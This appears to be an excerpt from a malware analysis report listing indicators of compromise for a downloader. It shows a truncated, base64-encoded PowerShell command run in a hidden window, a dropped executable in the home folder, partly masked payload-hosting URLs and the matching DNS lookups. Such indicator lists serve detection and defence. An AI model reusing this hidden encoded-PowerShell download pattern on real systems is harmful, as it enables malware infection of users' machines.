Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAFMAVgBCAEUAaQBuAHQAPQAnAFIASABVAEYAUgBpAGQAdwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBDAFUAcgBJAFQAYAB5AHAAUgBvAFQAbwBjAG8AbAAiACAAPQAgAC...
- %HOMEPATH%\692.exe
- %HOMEPATH%\692.exe
- http://al####ital.co.uk/js/tCmXt/
- http://ju#####planphoto.com/wp-admin/kQdOa4UxK/
- http://ke####ameron.net/tesl/1igM48/
- http://ke####ameron.net/cgi-sys/suspendedpage.cgi
- http://km##sa.net/dlpR/
- http://me####lucoesti.com/UdgDD2851/
- DNS ASK al####ital.co.uk
- DNS ASK ju#####planphoto.com
- DNS ASK ke####ameron.net
- DNS ASK km##sa.net
- DNS ASK me####lucoesti.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAFMAVgBCAEUAaQBuAHQAPQAnAFIASABVAEYAUgBpAGQAdwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBDAFUAcgBJAFQAYAB5AHAAUgBvAFQAbwBjAG8AbAAiACAAPQAgAC...' (with hidden window)